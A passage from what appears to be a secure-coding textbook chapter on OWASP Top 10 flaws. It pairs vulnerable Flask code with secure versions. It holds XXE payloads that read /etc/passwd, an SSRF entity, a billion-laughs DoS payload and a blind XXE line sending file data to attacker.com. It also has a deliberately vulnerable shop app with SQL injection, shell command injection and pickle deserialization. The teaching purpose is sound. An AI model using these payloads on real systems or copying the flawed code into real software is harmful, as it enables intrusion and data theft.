        # Derive key using PBKDF2
        kdf = PBKDF2(
            algorithm=hashes.SHA256(),
            length=32,
            salt=salt,
            iterations=480000,  # High iteration count
        )
        key = base64.urlsafe_b64encode(kdf.derive(self.master_key))
        
        # Encrypt data
        f = Fernet(key)
        encrypted = f.encrypt(data.encode())
        
        return {
            "ciphertext": base64.b64encode(encrypted).decode(),
            "salt": base64.b64encode(salt).decode(),
            "context": context,
            "algorithm": "PBKDF2+AES256"
        }
    
    def decrypt_sensitive_data(self, encrypted_package: dict) -> str:
        """
        Decrypt sensitive data
        """
        salt = base64.b64decode(encrypted_package["salt"])
        
        # Re-derive key
        kdf = PBKDF2(
            algorithm=hashes.SHA256(),
            length=32,
            salt=salt,
            iterations=480000,
        )
        key = base64.urlsafe_b64encode(kdf.derive(self.master_key))
        
        # Decrypt
        f = Fernet(key)
        encrypted_data = base64.b64decode(encrypted_package["ciphertext"])
        decrypted = f.decrypt(encrypted_data)
        
        return decrypted.decode()

# SECURE: Data Masking for Logs
class DataMasking:
    @staticmethod
    def mask_credit_card(cc_number):
        """
        Show only last 4 digits
        """
        if not cc_number or len(cc_number) < 4:
            return "****"
        return f"****-****-****-{cc_number[-4:]}"
    
    @staticmethod
    def mask_email(email):
        """
        Mask part of email: j***@example.com
        """
        if '@' not in email:
            return "****"
        local, domain = email.split('@')
        if len(local) <= 1:
            masked_local = "*"
        else:
            masked_local = local[0] + "*" * (len(local) - 1)
        return f"{masked_local}@{domain}"
    
    @staticmethod
    def sanitize_for_logging(data, sensitive_fields=None):
        """
        Remove or mask sensitive fields before logging
        """
        if sensitive_fields is None:
            sensitive_fields = ['password', 'ssn', 'credit_card', 'token', 'secret']
        
        sanitized = data.copy() if isinstance(data, dict) else {}
        
        for field in sensitive_fields:
            if field in sanitized:
                sanitized[field] = "[REDACTED]"
        
        return sanitized

# Usage in application
import logging

logger = logging.getLogger(__name__)

def process_payment(user_data):
    # Mask sensitive data before logging
    safe_data = DataMasking.sanitize_for_logging(user_data)
    logger.info(f"Processing payment for: {safe_data}")
    
    # Actual processing uses original data
    charge_credit_card(user_data['credit_card'])
```

---

## **38.6 XML External Entities (XXE)**

### **Overview**

XML External Entity (XXE) injection is a vulnerability that occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. Attackers can exploit XXE to access internal files, perform SSRF (Server-Side Request Forgery), cause DoS, or execute remote code.

**What are XML Entities?**
- **Internal Entities:** Defined within the DTD (Document Type Definition)
- **External Entities:** Reference external content via URL
  - **SYSTEM:** External file/resource
  - **PUBLIC:** Publicly defined entity

### **XXE Attack Types**

**1. File Disclosure (Local File Access):**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
```

**2. SSRF (Server-Side Request Forgery):**
```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server.com/admin">
]>
<foo>&xxe;</foo>
```

**3. Denial of Service (Billion Laughs Attack):**
```xml
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<!-- Expands to billions of "lol" strings, causing memory exhaustion -->
```

### **Vulnerable Code Example**

```python
# VULNERABLE - XXE
from flask import Flask, request
import xml.etree.ElementTree as ET  # Vulnerable by default in older Python versions
from lxml import etree  # Also vulnerable if not configured properly

app = Flask(__name__)

@app.route('/process_xml', methods=['POST'])
def process_xml_vulnerable():
    xml_data = request.data
    
    # DANGEROUS: Using vulnerable XML parser
    # By default, many XML parsers resolve external entities
    root = ET.fromstring(xml_data)  # Vulnerable in Python < 3.7
    
    # Process XML...
    return f"Processed: {root.tag}"

# Attack payload:
"""
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
"""
```

### **Secure Implementation**

```python
# SECURE - XXE Prevention
from flask import Flask, request
import defusedxml.ElementTree as ET  # Secure XML library
from lxml import etree
import xml.sax
import xml.sax.handler

app = Flask(__name__)

# Method 1: Use defusedxml (recommended for Python)
@app.route('/process_xml', methods=['POST'])
def process_xml_secure_defused():
    xml_data = request.data
    
    try:
        # defusedxml prevents XML bombs and external entities by default
        root = ET.fromstring(xml_data)
        return f"Processed safely: {root.tag}"
    except ET.ParseError as e:
        return f"Invalid XML: {str(e)}", 400

# Method 2: Configure lxml securely (if you must use lxml)
@app.route('/process_xml_lxml', methods=['POST'])
def process_xml_secure_lxml():
    xml_data = request.data
    
    try:
        # Create secure parser
        parser = etree.XMLParser(
            resolve_entities=False,  # Disable external entity resolution
            no_network=True,         # Disable network access
            load_dtd=False,         # Don't load external DTDs
            dtd_validation=False,   # Don't validate against DTD
            huge_tree=False         # Prevent memory exhaustion
        )
        
        # Parse with secure parser
        root = etree.fromstring(xml_data, parser=parser)
        return f"Processed safely: {root.tag}"
        
    except etree.XMLSyntaxError as e:
        return f"Invalid XML: {str(e)}", 400

# Method 3: If you must support DTDs but not external entities
class SecureContentHandler(xml.sax.handler.ContentHandler):
    def __init__(self):
        self.result = []
    
    def startElement(self, name, attrs):
        self.result.append(f"Start: {name}")
    
    def characters(self, content):
        self.result.append(f"Content: {content}")

def parse_xml_secure_sax(xml_data):
    """
    Using SAX parser with disabled external entities
    """
    handler = SecureContentHandler()
    parser = xml.sax.make_parser()
    
    # Disable external entities
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setFeature(xml.sax.handler.feature_external_pes, False)
    
    parser.setContentHandler(handler)
    parser.parse(xml_data)
    
    return handler.result

# Best Practices Summary for XXE Prevention:
"""
1. Use data formats that don't support external entities (JSON, YAML with safe loader)
2. If XML is required:
   - Disable XML external entity (XXE) processing in XML parsers
   - Disable DTD processing entirely if possible
   - Use less complex data formats like JSON when possible
3. Implement input validation and sanitization
4. Use Web Application Firewall (WAF) rules to detect XXE patterns
5. Keep XML parsers and libraries updated
"""
```

---

## **38.7 Broken Access Control**

### **Overview**

Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside of the user's limits. Access control vulnerabilities are now #1 in the OWASP Top 10 (2021).

**Common Access Control Vulnerabilities:**
- Violation of least privilege (granting excessive permissions)
- Bypassing access control checks by modifying URL or HTML
- Insecure Direct Object References (IDOR)
- Missing access controls for POST, PUT, DELETE
- Elevation of privilege (acting as admin when logged in as user)
- Metadata manipulation (JWT tokens, cookies)
- CORS misconfiguration allowing unauthorized API access

### **Insecure Direct Object Reference (IDOR)**

IDOR occurs when an application exposes a reference to an internal implementation object (database key, file, directory) without proper access control verification.

**Vulnerable Code Example:**

```python
# VULNERABLE - IDOR and Broken Access Control
from flask import Flask, request, session
import sqlite3

app = Flask(__name__)

@app.route('/api/user/<user_id>')
def get_user_insecure(user_id):
    """
    DANGEROUS: No verification that requesting user owns this data
    """
    conn = sqlite3.connect('app.db')
    cursor = conn.cursor()
    
    # Directly using user-provided ID without authorization check
    cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
    user = cursor.fetchone()
    
    if user:
        # Exposing all fields including sensitive ones
        return {
            "id": user[0],
            "username": user[1],
            "email": user[2],
            "password_hash": user[3],  # NEVER expose this!
            "ssn": user[4],            # NEVER expose this!
            "salary": user[5]          # Sensitive!
        }
    return "User not found", 404

# Attack: User A is logged in and accesses /api/user/123 (their own)
# Then tries /api/user/124, /api/user/125, etc. to see other users' data
# Including admin accounts!

@app.route('/admin/delete-user', methods=['POST'])
def delete_user_insecure():
    """
    DANGEROUS: No admin role verification
    """
    user_id = request.form['user_id']
    
    # Missing check: Is current user actually an admin?
    # Any authenticated user can delete any other user!
    
    conn = sqlite3.connect('app.db')
    cursor = conn.cursor()
    cursor.execute("DELETE FROM users WHERE id = ?", (user_id,))
    conn.commit()
    
    return f"User {user_id} deleted"
```

### **Secure Implementation**

```python
# SECURE: Proper Access Control
from flask import Flask, request, session, abort
from functools import wraps
import sqlite3
import jwt
from datetime import datetime, timedelta

app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key'

# Role-based access control decorator
def require_role(role):
    def decorator(f):
        @wraps(f)
        def decorated_function(*args, **kwargs):
            if 'user_id' not in session:
                return "Authentication required", 401
            
            user_role = session.get('role', 'user')
            
            # Check role hierarchy
            role_hierarchy = {
                'user': 1,
                'moderator': 2,
                'admin': 3
            }
            
            required_level = role_hierarchy.get(role, 3)
            user_level = role_hierarchy.get(user_role, 0)
            
            if user_level < required_level:
                app.logger.warning(
                    f"Access denied: User {session['user_id']} "
                    f"attempted admin action"
                )
                return "Access denied", 403
            
            return f(*args, **kwargs)
        return decorated_function
    return decorator

# Ownership verification decorator
def require_ownership_or_admin(param_name='user_id'):
    def decorator(f):
        @wraps(f)
        def decorated_function(*args, **kwargs):
            if 'user_id' not in session:
                return "Authentication required", 401
            
            current_user_id = session['user_id']
            current_user_role = session.get('role', 'user')
            
            # Get target user ID from request
            target_user_id = request.view_args.get(param_name) or \
                           request.form.get(param_name) or \
                           request.args.get(param_name)
            
            # Allow if user owns the resource OR is admin
            if str(current_user_id) != str(target_user_id) and current_user_role != 'admin':
                app.logger.warning(
                    f"IDOR attempt: User {current_user_id} "
                    f"tried to access user {target_user_id} data"
                )
                return "Access denied or resource not found", 404  # Don't reveal existence
            
            return f(*args, **kwargs)
        return decorated_function
    return decorator

@app.route('/api/user/<int:user_id>')
@require_ownership_or_admin('user_id')
def get_user_secure(user_id):
    """
    SECURE: Users can only view their own data unless admin
    """
    conn = sqlite3.connect('app.db')
    cursor = conn.cursor()
    
    cursor.execute(
        "SELECT id, username, email, created_at FROM users WHERE id = ?", 
        (user_id,)
    )
    user = cursor.fetchone()
    
    if not user:
        return "User not found", 404
    
    # Only return necessary fields
    return {
        "id": user[0],
        "username": user[1],
        "email": user[2],
        "created_at": user[3]
        # Explicitly NOT including: password_hash, ssn, internal_notes, etc.
    }

@app.route('/admin/delete-user', methods=['POST'])
@require_role('admin')
def delete_user_secure():
    """
    SECURE: Only admins can delete users
    """
    user_id = request.form.get('user_id')
    
    if not user_id:
        return "User ID required", 400
    
    # Additional audit logging
    app.logger.info(
        f"Admin {session['user_id']} deleting user {user_id}"
    )
    
    # Soft delete (safer than hard delete)
    conn = sqlite3.connect('app.db')
    cursor = conn.cursor()
    cursor.execute(
        "UPDATE users SET deleted_at = CURRENT_TIMESTAMP WHERE id = ?",
        (user_id,)
    )
    conn.commit()
    
    return f"User {user_id} marked for deletion"

# Additional Access Control Best Practices:

# 1. Principle of Least Privilege
def check_permission(user, resource, action):
    """
    Check if user has specific permission on resource
    """
    permissions = {
        'user': ['read_own'],
        'moderator': ['read_own', 'read_all', 'moderate'],
        'admin': ['read_own', 'read_all', 'moderate', 'delete', 'admin']
    }
    
    user_perms = permissions.get(user.role, [])
    required_perm = f"{action}_{resource}"
    
    return required_perm in user_perms or 'admin' in user_perms

# 2. Indirect Object References
def encode_id(internal_id):
    """
    Map internal IDs to external random IDs
    Prevents IDOR by not exposing sequential IDs
    """
    import hashlib
    import hmac
    
    # Use HMAC with secret key to create non-sequential external ID
    external_id = hmac.new(
        app.config['SECRET_KEY'].encode(),
        str(internal_id).encode(),
        hashlib.sha256
    ).hexdigest()[:16]
    
    # Store mapping in database or cache
    store_id_mapping(external_id, internal_id)
    
    return external_id

def decode_id(external_id):
    """Convert external ID back to internal ID"""
    return lookup_internal_id(external_id)
```

---

## **38.6 XML External Entities (XXE) - Advanced**

### **XXE Variations**

**1. Blind XXE (Out-of-Band):**
When direct output isn't available, use external DTDs to exfiltrate data:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

<!-- evil.dtd on attacker server -->
<!ENTITY % send "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
```

**2. XXE via File Upload:**
SVG images, DOCX files, and other XML-based formats can contain XXE payloads.

**3. Error-Based XXE:**
Trigger parsing errors that include file contents in error messages.

### **Comprehensive XXE Prevention**

```python
# SECURE: Comprehensive XXE Prevention
import xml.etree.ElementTree as ET
from lxml import etree
import defusedxml.ElementTree as DefusedET
import defusedxml.lxml as DefusedLxml

class SecureXMLParser:
    """
    Secure XML parsing with XXE protection
    """
    
    @staticmethod
    def parse_xml_safe(xml_string):
        """
        Method 1: Use defusedxml (recommended for Python)
        """
        try:
            # defusedxml prevents XML bombs and external entities by default
            root = DefusedET.fromstring(xml_string)
            return root
        except DefusedET.ParseError as e:
            raise ValueError(f"Invalid XML: {e}")
    
    @staticmethod
    def parse_xml_lxml_secure(xml_string):
        """
        Method 2: Configure lxml securely
        """
        try:
            # Create secure parser
            parser = etree.XMLParser(
                resolve_entities=False,  # Critical: Disable external entities
                no_network=True,         # Disable network access
                load_dtd=False,          # Don't load DTDs
                dtd_validation=False,    # Don't validate against DTD
                huge_tree=False,         # Prevent memory exhaustion
                remove_comments=True,    # Remove comments (can hide attacks)
                remove_pis=True          # Remove processing instructions
            )
            
            # Parse with secure parser
            root = etree.fromstring(xml_string, parser=parser)
            return root
            
        except etree.XMLSyntaxError as e:
            raise ValueError(f"XML parsing error: {e}")
    
    @staticmethod
    def parse_xml_minidom_secure(xml_string):
        """
        Method 3: Using xml.dom.minidom securely
        """
        from xml.dom import minidom
        from xml.sax import make_parser
        from xml.sax.handler import feature_external_ges, feature_external_pes
        
        # Create parser with secure settings
        parser = make_parser()
        parser.setFeature(feature_external_ges, False)
        parser.setFeature(feature_external_pes, False)
        
        # Parse with secure parser
        dom = minidom.parseString(xml_string, parser=parser)
        return dom

# Additional Security Measures:

# 1. Input Validation
def validate_xml_input(xml_string):
    """
    Validate XML before parsing
    """
    # Check size (prevent XML bombs)
    if len(xml_string) > 10 * 1024 * 1024:  # 10MB limit
        raise ValueError("XML document too large")
    
    # Check for suspicious patterns
    suspicious_patterns = [
        r'<!ENTITY\s+.*SYSTEM',
        r'<!ENTITY\s+.*PUBLIC',
        r'file://',
        r'http://.*<!ENTITY',
        r'ftp://',
    ]
    
    import re
    for pattern in suspicious_patterns:
        if re.search(pattern, xml_string, re.IGNORECASE):
            raise ValueError(f"Potentially malicious XML pattern detected: {pattern}")
    
    return True

# 2. Content Security Policy for XML processing results
def set_secure_headers(response):
    """
    Set headers to prevent XSS via processed XML content
    """
    response.headers['Content-Security-Policy'] = "default-src 'self'"
    response.headers['X-Content-Type-Options'] = 'nosniff'
    response.headers['X-Frame-Options'] = 'DENY'
    return response
```

---

## **38.8 Security Misconfiguration**

### **Overview**

Security misconfiguration is the most commonly seen vulnerability, typically resulting from:
- Default configurations (default passwords, unnecessary default features)
- Incomplete or ad hoc configurations
- Open cloud storage (S3 buckets)
- Misconfigured HTTP headers
- Verbose error messages containing sensitive information
- Not removing unused features/pages

### **Common Misconfigurations and Fixes**

```python
# SECURE: Flask Security Configuration
from flask import Flask
from flask_talisman import Talisman
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

app = Flask(__name__)

# 1. Security Headers (Talisman)
Talisman(app,
    force_https=True,
    strict_transport_security=True,
    strict_transport_security_max_age=31536000,  # 1 year
    content_security_policy={
        'default-src': "'self'",
        'script-src': "'self'",
        'style-src': "'self' 'unsafe-inline'",
        'img-src': "'self' data: https:",
        'font-src': "'self'",
        'connect-src': "'self'",
        'frame-ancestors': "'none'",  # Prevent clickjacking
        'base-uri': "'self'",
        'form-action': "'self'"
    },
    referrer_policy='strict-origin-when-cross-origin',
    feature_policy={
        'geolocation': "'none'",
        'microphone': "'none'",
        'camera': "'none'"
    }
)

# 2. Rate Limiting
limiter = Limiter(
    app=app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"]
)

@app.route('/login', methods=['POST'])
@limiter.limit("5 per minute")  # Strict limit for login
def login():
    # Login logic
    pass

# 3. Secure Session Configuration
app.config.update(
    SESSION_COOKIE_SECURE=True,      # HTTPS only
    SESSION_COOKIE_HTTPONLY=True,    # No JavaScript access
    SESSION_COOKIE_SAMESITE='Lax',   # CSRF protection
    PERMANENT_SESSION_LIFETIME=1800,  # 30 minutes
    SESSION_REFRESH_EACH_REQUEST=True
)

# 4. Disable Debug Mode in Production
app.config['DEBUG'] = False
app.config['ENV'] = 'production'

# 5. Error Handling (No stack traces to users)
@app.errorhandler(500)
def internal_error(error):
    app.logger.error(f"Server Error: {error}", exc_info=True)
    return "An internal error occurred", 500

@app.errorhandler(404)
def not_found(error):
    return "Resource not found", 404

# 6. Remove Default Routes
# Disable Flask's default static file serving if not needed
# app = Flask(__name__, static_folder=None)

# 7. Security.txt and Headers
@app.route('/.well-known/security.txt')
def security_txt():
    return """
    Contact: security@example.com
    Acknowledgments: https://example.com/hall-of-fame
    Policy: https://example.com/security-policy
    Hiring: https://example.com/jobs
    """

# 8. Content Security Policy Reporting
@app.route('/csp-report', methods=['POST'])
def csp_report():
    report = request.get_json()
    app.logger.warning(f"CSP Violation: {report}")
    return '', 204
```

---

## **38.9 Using Components with Known Vulnerabilities**

### **Overview**

Components (libraries, frameworks, and other software modules) run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable various attacks.

**Common Issues:**
- Not knowing all components used (transitive dependencies)
- Not scanning for vulnerabilities regularly
- Not upgrading components promptly
- Using unsupported or deprecated components
- Not verifying component integrity (supply chain attacks)

### **Secure Dependency Management**

```python
# SECURE: Dependency Management and Vulnerability Scanning

# requirements.txt with pinned versions (not vulnerable versions)
"""
flask==2.3.2  # Updated to patch known vulnerabilities
werkzeug==2.3.6
cryptography==41.0.0  # Updated for latest security patches
requests==2.31.0
urllib3==2.0.3  # Updated for HTTP/2 security fixes
jinja2==3.1.2  # Updated for sandbox escape fixes
"""

# Automated vulnerability scanning with Safety
# pip install safety
# safety check -r requirements.txt

# GitHub Dependabot configuration (.github/dependabot.yml)
"""
version: 2
updates:
  - package-ecosystem: "pip"
    directory: "/"
    schedule:
      interval: "daily"
    open-pull-requests-limit: 10
    reviewers:
      - "security-team"
    labels:
      - "security"
      - "dependencies"
"""

# Software Bill of Materials (SBOM) generation
# pip install cyclonedx-bom
# cyclonedx-py -r -o sbom.json

# Integrity verification for critical dependencies
import hashlib
import hmac

def verify_dependency_integrity(package_path, expected_hash):
    """
    Verify package hasn't been tampered with
    """
    sha256_hash = hashlib.sha256()
    with open(package_path, "rb") as f:
        for byte_block in iter(lambda: f.read(4096), b""):
            sha256_hash.update(byte_block)
    
    actual_hash = sha256_hash.hexdigest()
    if not hmac.compare_digest(actual_hash, expected_hash):
        raise ValueError(f"Package integrity check failed: {package_path}")
    
    return True

# Dependency isolation with virtual environments
# Always use virtualenv/venv to isolate project dependencies
# python -m venv venv
# source venv/bin/activate  (Linux/Mac)
# venv\Scripts\activate  (Windows)

# Container security - minimal base images
# Dockerfile:
"""
FROM python:3.11-slim  # Use slim or alpine, not full

# Create non-root user
RUN useradd -m -u 1000 appuser
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY . .
RUN chown -R appuser:appuser /app
USER appuser  # Run as non-root

EXPOSE 8000
CMD ["gunicorn", "--bind", "0.0.0.0:8000", "app:app"]
"""
```

---

## **38.10 Insufficient Logging and Monitoring**

### **Overview**

Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

**What to Log:**
- Authentication successes and failures
- Access control failures
- Input validation failures
- Suspicious user behavior (multiple failed logins)
- Administrative actions (user creation, permission changes)
- Data modifications (create, update, delete)
- Security-related configuration changes
- Activation/deactivation of security controls

**What NOT to Log:**
- Passwords
- Credit card numbers (PCI violation)
- Social Security Numbers
- Encryption keys
- Session tokens (unless hashed)
- Personal Health Information (PHI)

### **Secure Logging Implementation**

```python
# SECURE: Comprehensive Logging and Monitoring
import logging
import logging.handlers
import json
import hashlib
import hmac
from datetime import datetime
from flask import Flask, request, session, g
import syslog
import requests

app = Flask(__name__)

# Secure logging configuration
class SecurityFormatter(logging.Formatter):
    """
    Formatter that includes security-relevant fields
    """
    def format(self, record):
        log_data = {
            "timestamp": datetime.utcnow().isoformat(),
            "level": record.levelname,
            "message": record.getMessage(),
            "module": record.module,
            "function": record.funcName,
            "line": record.lineno,
            "thread_id": record.thread,
            "correlation_id": getattr(g, 'correlation_id', 'unknown')
        }
        
        # Add request context if available
        if request:
            log_data.update({
                "method": request.method,
                "path": request.path,
                "remote_addr": hash_ip(request.remote_addr),  # Hash IP for privacy
                "user_agent": request.headers.get('User-Agent', 'unknown'),
                "user_id": session.get('user_id', 'anonymous')
            })
        
        return json.dumps(log_data)

def hash_ip(ip_address):
    """
    Hash IP address for privacy compliance (GDPR)
    """
    if not ip_address:
        return "unknown"
    return hashlib.sha256(ip_address.encode()).hexdigest()[:16]

# Configure logging
logger = logging.getLogger('security')
logger.setLevel(logging.INFO)

# File handler with rotation
file_handler = logging.handlers.RotatingFileHandler(
    'security.log',
    maxBytes=10485760,  # 10MB
    backupCount=10
)
file_handler.setFormatter(SecurityFormatter())
logger.addHandler(file_handler)

# Syslog handler for SIEM integration
syslog_handler = logging.handlers.SysLogHandler(address='/dev/log')
syslog_handler.setFormatter(SecurityFormatter())
logger.addHandler(syslog_handler)

# Security event logging functions
def log_auth_event(event_type, username, success, details=None):
    """
    Log authentication events
    """
    event_data = {
        "event_type": "authentication",
        "sub_type": event_type,  # login, logout, failed_attempt, password_change
        "username": username,
        "success": success,
        "ip_address": request.remote_addr if request else None
    }
    
    if details:
        event_data.update(details)
    
    if success:
        logger.info("Authentication event", extra={"event_data": event_data})
    else:
        logger.warning("Authentication failure", extra={"event_data": event_data})
        
        # Check for brute force attempts
        check_brute_force_protection(username, request.remote_addr)

def log_access_control_event(user_id, resource, action, granted):
    """
    Log access control decisions
    """
    event_data = {
        "event_type": "access_control",
        "user_id": user_id,
        "resource": resource,
        "action": action,
        "granted": granted,
        "timestamp": datetime.utcnow().isoformat()
    }
    
    if granted:
        logger.info("Access granted", extra={"event_data": event_data})
    else:
        logger.warning("Access denied", extra={"event_data": event_data}})

def log_data_modification(user_id, table, record_id, action, old_values=None, new_values=None):
    """
    Log data changes for audit trail
    """
    # Sanitize values to avoid logging sensitive data
    def sanitize_values(values):
        if not values:
            return None
        sensitive_fields = ['password', 'ssn', 'credit_card', 'cvv']
        sanitized = {}
        for k, v in values.items():
            if k.lower() in sensitive_fields:
                sanitized[k] = '[REDACTED]'
            else:
                sanitized[k] = v
        return sanitized
    
    event_data = {
        "event_type": "data_modification",
        "user_id": user_id,
        "table": table,
        "record_id": record_id,
        "action": action,  # CREATE, UPDATE, DELETE
        "old_values": sanitize_values(old_values),
        "new_values": sanitize_values(new_values)
    }
    
    logger.info("Data modification", extra={"event_data": event_data})

# Monitoring and Alerting
class SecurityMonitor:
    def __init__(self):
        self.alert_thresholds = {
            'failed_logins': 5,      # per 5 minutes
            'access_denied': 10,     # per minute
            'error_rate': 50          # per minute
        }
        self.time_window = 300  # 5 minutes
    
    def check_anomalies(self):
        """
        Check for suspicious patterns
        """
        # This would typically query a SIEM or log aggregation system
        recent_events = get_recent_events(self.time_window)
        
        # Check for brute force attacks
        failed_logins = count_failed_logins(recent_events)
        if failed_logins > self.alert_thresholds['failed_logins']:
            self.send_alert(
                "Possible Brute Force Attack",
                f"{failed_logins} failed login attempts in {self.time_window} seconds"
            )
            # Implement automatic IP blocking
            block_suspicious_ips(recent_events)
        
        # Check for access control violations
        access_denied = count_access_denied(recent_events)
        if access_denied > self.alert_thresholds['access_denied']:
            self.send_alert(
                "High Rate of Access Denials",
                f"{access_denied} access denied errors in {self.time_window} seconds"
            )

    def send_alert(self, title, message):
        """
        Send alert to security team
        """
        alert_data = {
            "severity": "high",
            "title": title,
            "message": message,
            "timestamp": datetime.utcnow().isoformat(),
            "source": "security_monitor"
        }
        
        # Send to Slack/PagerDuty/Email
        requests.post(
            'https://hooks.slack.com/services/SECURITY_CHANNEL',
            json={"text": f"SECURITY ALERT: {title}\n{message}"}
        )
        
        logger.critical(f"Security Alert: {title} - {message}")

# Integration with application
@app.before_request
def before_request():
    # Generate correlation ID for tracing
    g.correlation_id = secrets.token_hex(16)
    g.start_time = time.time()

@app.after_request
def after_request(response):
    # Log all requests for audit trail
    duration = time.time() - g.start_time
    
    log_data = {
        "method": request.method,
        "path": request.path,
        "status": response.status_code,
        "duration": duration,
        "correlation_id": getattr(g, 'correlation_id', None),
        "user_id": session.get('user_id', 'anonymous')
    }
    
    if response.status_code >= 400:
        logger.warning("Request completed with error", extra=log_data)
    else:
        logger.info("Request completed", extra=log_data)
    
    return response
```
---

## **38.11 Practical Security Assessment: Complete Example**

To consolidate our understanding of the vulnerabilities covered in this chapter, let's examine a realistic e-commerce application that contains multiple security flaws, followed by a comprehensive secure implementation.

### **Vulnerable E-Commerce Application**

```python
# VULNERABLE E-COMMERCE APPLICATION
# WARNING: This code contains intentional security flaws for educational purposes

from flask import Flask, request, session, render_template_string, redirect
import sqlite3
import hashlib
import xml.etree.ElementTree as ET
import subprocess
import pickle
import base64

app = Flask(__name__)
app.secret_key = 'weak_secret_key_123'

# Database connection
def get_db():
    return sqlite3.connect('ecommerce.db')

# VULNERABILITY 1: SQL Injection in search
@app.route('/search')
def search_products():
    query = request.args.get('q', '')
    conn = get_db()
    cursor = conn.cursor()
    
    # DANGEROUS: String concatenation
    sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"
    cursor.execute(sql)
    products = cursor.fetchall()
    
    return render_template_string("""
        <h1>Search Results for: {{ query }}</h1>
        <ul>{% for p in products %}<li>{{ p[1] }} - ${{ p[2] }}</li>{% endfor %}</ul>
    """, query=query, products=products)

# VULNERABILITY 2: Broken Authentication
@app.route('/login', methods=['POST'])
def login():
    username = request.form['username']
    password = request.form['password']
    
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
    user = cursor.fetchone()
    
    # WEAK: MD5 hashing
    if user and hashlib.md5(password.encode()).hexdigest() == user[2]:
        session['user_id'] = user[0]
        session['role'] = user[3]
        # VULNERABILITY: No session regeneration (session fixation)
        return "Logged in!"
    
    # INFORMATION DISCLOSURE: Different messages reveal username existence
    return "Invalid password" if user else "Username not found"

# VULNERABILITY 3: Broken Access Control (IDOR)
@app.route('/order/<order_id>')
def view_order(order_id):
    if 'user_id' not in session:
        return "Not logged in", 401
    
    conn = get_db()
    cursor = conn.cursor()
    
    # DANGEROUS: No check if order belongs to current user
    cursor.execute("SELECT * FROM orders WHERE id = ?", (order_id,))
    order = cursor.fetchone()
    
    if order:
        return {
            "order_id": order[0],
            "user_id": order[1],
            "items": order[2],
            "total": order[3],
            "credit_card": order[4]  # SENSITIVE DATA EXPOSURE!
        }
    return "Order not found", 404

# VULNERABILITY 4: XSS
@app.route('/profile', methods=['GET', 'POST'])
def profile():
    if 'user_id' not in session:
        return redirect('/login')
    
    conn = get_db()
    cursor = conn.cursor()
    
    if request.method == 'POST':
        bio = request.form['bio']
        # STORED XSS: No sanitization of user input
        cursor.execute(
            "UPDATE users SET bio = ? WHERE id = ?",
            (bio, session['user_id'])
        )
        conn.commit()
    
    cursor.execute("SELECT bio FROM users WHERE id = ?", (session['user_id'],))
    bio = cursor.fetchone()[0]
    
    # REFLECTED XSS: Direct output of user input
    return f"""
    <html>
        <body>
            <h1>Your Profile</h1>
            <form method="POST">
                <textarea name="bio">{bio}</textarea>
                <button>Save</button>
            </form>
            <div>Preview: {bio}</div>
        </body>
    </html>
    """

# VULNERABILITY 5: XXE
@app.route('/import', methods=['POST'])
def import_data():
    xml_data = request.data
    
    # DANGEROUS: Vulnerable XML parsing
    root = ET.fromstring(xml_data)
    
    # Process import...
    return "Import successful"

# VULNERABILITY 6: Command Injection
@app.route('/backup', methods=['POST'])
def create_backup():
    if session.get('role') != 'admin':
        return "Unauthorized", 403
    
    filename = request.form['filename']
    
    # DANGEROUS: Command injection
    command = f"tar -czf /backups/{filename}.tar.gz /data"
    result = subprocess.check_output(command, shell=True)
    
    return f"Backup created: {result.decode()}"

# VULNERABILITY 7: Insecure Deserialization
@app.route('/load-session', methods=['POST'])
def load_session():
    data = request.form['data']
    
    # DANGEROUS: Insecure deserialization
    session_data = pickle.loads(base64.b64decode(data))
    
    return f"Session loaded: {session_data}"
```

### **Secure E-Commerce Implementation**

```python
# SECURE E-COMMERCE APPLICATION
# Comprehensive security implementation

from flask import Flask, request, session, abort, make_response
